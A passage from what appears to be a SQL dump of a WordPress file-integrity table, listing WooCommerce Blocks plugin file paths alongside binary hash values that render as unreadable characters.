cY2G','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','uq\r\n)\ZI','`k8Uؖ؟\0?(ˌɗ㕁B!','',0,'?'),('EVF#Kfku#','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/block.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$;bĨh\\','<i[,|\"245\'@-zFx','',0,'?'),('cTyg#FjPN','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/edit.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ІL6]4','{bj?ʁf\0ԍH[wd\\\nqIE','',0,'?'),('\n2NԴ:S+xq\r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/frontend.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S5ӶX:','k\Z9.u\ZS74L','',0,'?'),('麲I0Dp','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/get-categories.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~{2E.>9R','ᗠ&:f5^V/}Pz','',0,'?'),('&r@7&','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/hierarchy.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' O\'u6LDe','MF~M[~OhB$>{6NrakYIQF','',0,'?'),('dר;v,QhlP\Zw>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RkPϤ/F','\reQ~7uglTr_1.','',0,'?'),('3Ŷx97Kد','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/block.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Nx_\\\\','ʟ#=\Z,r?`hVͺ','',0,'?'),('KI`)(:f','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D[ϴ3N\0*5',';Uab,*ѾҀ-IV[8ɝ%u','',0,'?'),('zB2Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/block.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ƞ\r	','Lr!\0a)V=PO a!','',0,'?'),('ťn`s','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-new/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' E0$tg=qv','р\Z\ZPW\0>80_0KS','',0,'?'),('䀘2m<T','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/block.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','K	e%$ī','	~ym5#3Fy\Z8','',0,'?'),('w<SDA&\\','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-on-sale/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gG}`#W\\','fQOoGrkM>.ea','',0,'?'),('5.rE~y\'&','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/block.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','WT(2Xq','<C|x#s2\"8T:F&I','',0,'?'),(' nui','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-tag/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gīOxxgb','gS)8:L!\\sWJ>i+0SڼH>','',0,'?'),('Z\';%.Ǔ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/block.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':Z\0*','eս}3Z4?aϸvE: ','',0,'?'),('_uu%ノsX','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-top-rated/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dg|I\'\'}','\"q{*;I]$BE]afJlIZ*','',0,'?'),('y?n벃','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/block.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	kCnq\ZLq','D/\\^;\\oפŔ	AU@OsP>','',0,'?'),('6L뙈Sz','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/products-by-attribute/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Xfk3T~i','`JָۘUKaw@ugr>p','',0,'?'),('dwJ69Ȩ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/grid-content-control/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6Β2+	6=\"F','س`Blxc<ҔE14I\r[P=\"id','',0,'?'),('rdb+?<~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/grid-layout-control/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','RP`5`-V','Ȏ-%MZ; ,0;Hqoiݗ','',0,'?'),('2%⧼lRA51','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/checkbox-checked.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4i0.L.Z','=zδyV/՗W<?nJ#','',0,'?'),('+XgHÞu7','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/checkbox-unchecked.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','DnH\0}(0','>~aTNTK\0[+wx.N','',0,'?'),('L1Yvg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/folder-star.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\">=*','	cT\\)߉r^%6y','',0,'?'),('vtZ#b','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/folder.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Bb6(CdN7_','j|@aDmnk(18TRj1At6Fu','',0,'?'),('nK{x2.','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','	4CY4\'6ԉݜ','T,?esV3XK,P=֭M','',0,'?'),('iieB9V;{','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/new-releases.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĪU76ns|\"H','zz$?o1\r?Zqu2*}G','',0,'?'),('u+,〿','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/radio-selected.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C%;Y8','J/\rsV-Ximo\r5JK\nK^','',0,'?'),('<i1&;nW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/radio-unselected.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','aw{bl','MMNv*^EHk N*q','',0,'?'),('G,ߠհ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/widgets.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2\'\0lha','YڰEޒѾm?/:fIt=<j','',0,'?'),('١)5tL﫲Wc','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/icons/woo.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`W\"܍1P','5og8ZXӹzS.=*ӂ(','',0,'?'),('m\\bs~+hok','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-attribute-control/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S~&rɤ]','}F-2Nc8	RxVo3H=','',0,'?'),('a@?y^=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-category-control/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','dB֫>~RnnR','9ꜝnC4vP#kecK~C','',0,'?'),('l|{ל_c*~','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-control/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=<Z\rC^.','O=˖Y/ScY9ru_e8','',0,'?'),('*iW)t`\\','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-orderby-control/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M~y:vU!a','kP,B\'k\n=ն9t.ԉl3U','',0,'?'),('<n/jzf','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-preview/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˳ZB\\^N','߀{)GQcVӈّ;U','',0,'?'),('dbj3aK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-preview/test/__snapshots__/index.js.snap',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','S\0^4}&','a):ʆ/骏l[OeK','',0,'?'),('!p5R','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-preview/test/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~.s','\nEY*\nVDig`Q_','',0,'?'),('iwf0B?\'f2?','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/product-tag-control/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@?OfF,^XG|','X~O1֔XW\0,q<<H','',0,'?'),('$=`Ww','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/products-control/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M8Mu%','^Ʈy谫ˍhW%7)s_I','',0,'?'),('TaYTqw]>io','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/toggle-button-control/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')=	oR?԰','By|2rut7vў%ص8P','',0,'?'),('i``>aq','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/components/utils/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Z\r\Z+g','f>q6I+#w~(Kh~n=xG','',0,'?'),('z?z}bIni\r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/index.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\"*3خ\r','sΰ)oQdH4Z','',0,'?'),('	d7}N1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/deprecations.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ť%ML]fѢ\n','cʂ\Z,U;\Z%,M+x݂','',0,'?'),(']\\`av','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/get-query.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LwXh$','`} WGYG=Y\0','',0,'?'),('J\rB]E-1','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/get-shortcode.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']TD5',')9H?@ó2/dnvQu','',0,'?'),('b#:,dW','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/products.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6MRDY','MaR\07TXO/V','',0,'?'),('Lͥ8K8/8r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/shared-attributes.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','f۞.G@\n\\','h\'8J)-,cLU^un.rS1','',0,'?'),('hѪ-(%9AOv','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/test/get-query.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6P>~fq','|­\Z@ˋ=k,Hcaݓ\"͌;_','',0,'?'),('0Y)','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/utils/with-component-id.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=6.9','D\"bݓ<\0Fj~Ç!̨)','',0,'?'),('t9U6/L/|','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/blocks.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gn8eb','\Z5]g.5|wq$y؜p3p9','',0,'?'),('De5H?кg)+G','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-category.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڃ[\na','Vtl\n%kC`q\"W','',0,'?'),('\ZOH,ֹd{0B','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/featured-product.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',']ݵ+lw','qkR`MZlP88HhLz3GI','',0,'?'),('F>{;hr','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/frontend.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&tO\"vj','	\Z+n\"!!l#Lސ9}:','',0,'?'),('2W䔦#N','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/handpicked-products.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','==z`@vr','ʻ\\(졮2ʋ|)Ue','',0,'?'),('*4g\"I','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-best-sellers.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$!\\UBH$','\ZhR(Yz&]]˷Fw','',0,'?'),('	,` ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-categories.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A}k-ɋhCH<',' ͒%|W+\'­qve]JFb','',0,'?'),('TLeQG\nӂ߸g','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-category.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2L?/ϧt\0]\"','ˀåI_n@4)E','',0,'?'),('\ZM)j(ZV','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-new.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','J5-~`K','/r]W~kC]7臻t>[V','',0,'?'),('_R5YӚR','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-on-sale.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ĜA3{ǲ','ʒ*\\먙,%rp.)d=0Q|_oAj','',0,'?'),('+1iI1kpn','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-tag.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eS%	NMʺd','y\\E\\\0$A{]ۏ][','',0,'?'),('?Ha0Ej','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/product-top-rated.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ļ4k.WfyG','87j& :,tغw4\Zeq#<y','',0,'?'),('i4\Zg','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/products-by-attribute.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','zF\ryG@','K\0K	(SFTqmr=','',0,'?'),('%2M3oBE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/vendors.js',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','&B*Q.p%&','JNw\"x[\r~*Z:ݻnu','',0,'?'),('FZ2','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Assets.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+O\n{Zi',':Be{q%Ai%DVBρ','',0,'?'),('xPw8Z:','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractBlock.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l;yґt]w','qb|7l]Kkʮ:\"8y-I','',0,'?'),('m\r_NIFa','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractDynamicBlock.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t#S?qC]aܨz','W(@^!\n?v6\'FʛWU','',0,'?'),('{ǑU5sn=[','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/AbstractProductGrid.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','j©\rzJ+*rIQ','@I1+5B\'LAR#6cٖ','',0,'?'),('D</pb{_','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedCategory.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[_ہ','\r6\nlYxXNP=MYKT/}','',0,'?'),('t#Աcle','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/FeaturedProduct.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*sK?Kn7','8GT\ZlVB2AW=ehSup[','',0,'?'),('棄y)8LJ2','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/HandpickedProducts.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',':˗|8PpDu','ʯ%$\rP[` x0A','',0,'?'),('\nL-\Z>hNA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductBestSellers.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1 ȴ:gmj#','7xhImW0MEjL/Gv8','',0,'?'),('㚕SUbPR		','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategories.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*[A,jL4a~','ڑ^K?fA*Ƥ-C2Wk','',0,'?'),('g Aҫe','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductCategory.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c]|INº',']\\#U_:Lx@w3)(tGo','',0,'?'),('й\\❙','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductNew.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y!(Q5Gח^','m,vN_+lR%','',0,'?'),('FɔR<\\CE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductOnSale.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ZKOblsN','7leq#NQId>uIX1','',0,'?'),('bLP!<4t0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTag.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','B&xz5w֝c','&ܪZ^$Ne77<(ltf','',0,'?'),('dhC\Zg2)j#','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductTopRated.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7vC)y&w:W','ĤRtGd{vO=E&%.0r','',0,'?'),('<HU&B\r+','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/BlockTypes/ProductsByAttribute.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','prM8B','Q=p)PAi0	PΙ`F4','',0,'?'),('\\~^bk)KA','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Library.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','hHy\nZ1N$cV>','[G(%>gR^sjbسN	,','',0,'?'),('̓/Y6}%Z !','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/Package.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@NOOS','QVZjjs u0IT o,vٿϦ%','',0,'?'),('o=rgu','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/ProductAttributeTerms.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','V&[!1B3d','oGš?#\\4CD','',0,'?'),('$X:VϜr','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/ProductAttributes.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','˭Xcw#)t','(2JÒQ6ąGј','',0,'?'),('S3N','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/ProductCategories.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','CY+~\0(#Iב','/K>^ږ¦|`F-','',0,'?'),('k7Vn츐:A','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/ProductTags.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','܄uֱPa`','Ū3$T)l۬k(򌈦;','',0,'?'),('WޛHĖ6tֺ*','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/Products.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Φ3p?sޯ#!','Z&>~+e#\"','',0,'?'),('l $uFĚ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi/Controllers/Variations.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֏xX˘MZ7r','c>;%R2M-\nZ!%uI','',0,'?'),('4֩=P','wp-content/plugins/woocommerce/packages/woocommerce-blocks/src/RestApi.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\Zy\"ىy','\0Dp-jdba%j~GQw:','',0,'?'),('[9>0Eeh','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/autoload.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4	CALfpb','^pS9LY	J\0y@vwu!#','',0,'?'),('ĤQ6$\\|)X','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/autoload_packages.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ݔJIe|Kj','sUAHe.F\Z+ꊙH4l}G','',0,'?'),('3h~B* BN','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/automattic/jetpack-autoloader/src/AutoloadGenerator.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oM-~a,\'','R^;l\Zx:Nvb','',0,'?'),('AȌJpWQD?n<i{','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/automattic/jetpack-autoloader/src/CustomAutoloaderPlugin.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','3T*t3ݽzƋ','UZX\rs0=R,0\'v2X','',0,'?'),('d6!`t','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/automattic/jetpack-autoloader/src/autoload.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5ϼ˷1d','I|B!-HBT\0','',0,'?'),('<an/Yi=','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/ClassLoader.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|%*T*`','289vu3n	C2sva/','',0,'?'),('W8UdOK','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/autoload_classmap.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EӤ㭇Mg','Q*\'B+Eߞ:myuW','',0,'?'),('<iΨ<[7','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/autoload_classmap_package.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','tVc=1,`8','ϸxpLHFfcQJ\"\'ume','',0,'?'),('y	D3uQ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/autoload_namespaces.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','5,}vĨ3G)','Er4@\0ԡ$z3$l\Z`iexl','',0,'?'),('b:{,Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/autoload_psr4.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','SPm`#\Z',')._QJ}$0>)@=;d\'_','',0,'?'),('|0}YU','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/autoload_real.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')<FAT@4[}','\niE\rEtkn%OB|+H6','',0,'?'),('K79<','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/autoload_static.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=s|{M','̝w|YAn?؟+~ŏV0','',0,'?'),('o*(BuLd\ZZ','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/AglInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Cc=W*Dg','3(W~;M<dz4','',0,'?'),('޳\n;+1e','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/AimeosInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','EWMi6=<*@}m','DRV\\ŭ<7ty	,8YmL','',0,'?'),('|\\T,V9t);O[B','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/AnnotateCmsInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1csDh%[p!4\"',';<EU%HwDDˋ8T','',0,'?'),('Lg)*UE','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/AsgardInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','LJM','V\n#\nA@,c]:a# a\n&7','',0,'?'),('n,|/@{','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/AttogramInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','oGE\r','}DlqX\"aGGuVX}=','',0,'?'),('	J8ǪnV	p','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/BaseInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','!mV9q}','t.tX@iZT7&\\&-Yd','',0,'?'),('v\"(oG`','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/BitrixInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','h!fŪe%Q','XTQms`DPç,|쫺d8','',0,'?'),('豤֋O{߹qD','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/BonefishInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','u\".O	\"O-B','`Ś睤ybktBI','',0,'?'),('tZЩYPz;','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/CakePHPInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6k_sx','h;[8{ܠ^xx\r','',0,'?'),('˥ȳc-y','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/ChefInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t&r@;f','iifzΰP\\B<Wٴp2,T','',0,'?'),('=o<w}䯖','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/CiviCrmInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','eSu-՘}','ix_Kn&F:ra0','',0,'?'),('xXVajnWL$','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/ClanCatsFrameworkInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','4֖1dGL','>9Y\rYOC4huG[','',0,'?'),('5Β%d\'K','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/CockpitInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','֗6>,!','Sſ`0$ RW>c:5ΚMä','',0,'?'),('zS!Uҋ\0','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/CodeIgniterInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','H=u]R9','Km}DS7ښL<ya','',0,'?'),('Wy)[	FT:}','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/Concrete5Installer.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','t	m!~A^S','#L?OM6r/W_~','',0,'?'),(']`HJ\Z','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/CraftInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','إg]b','gD>IB9LI	*1160C|','',0,'?'),('*8LT)r','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/CroogoInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','AvE\"M\\M','4(eI892-뱎ļ~]','',0,'?'),('i瓃4%>','wp-content/plugins/woocommerce/packages/woocommerce-blocks/vendor/composer/installers/src/Composer/Installers/DecibelInstaller.php',0,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+r\"`lҮvv','#5}͏	\\fWİ~C`Oc,','',0,'?'),('n	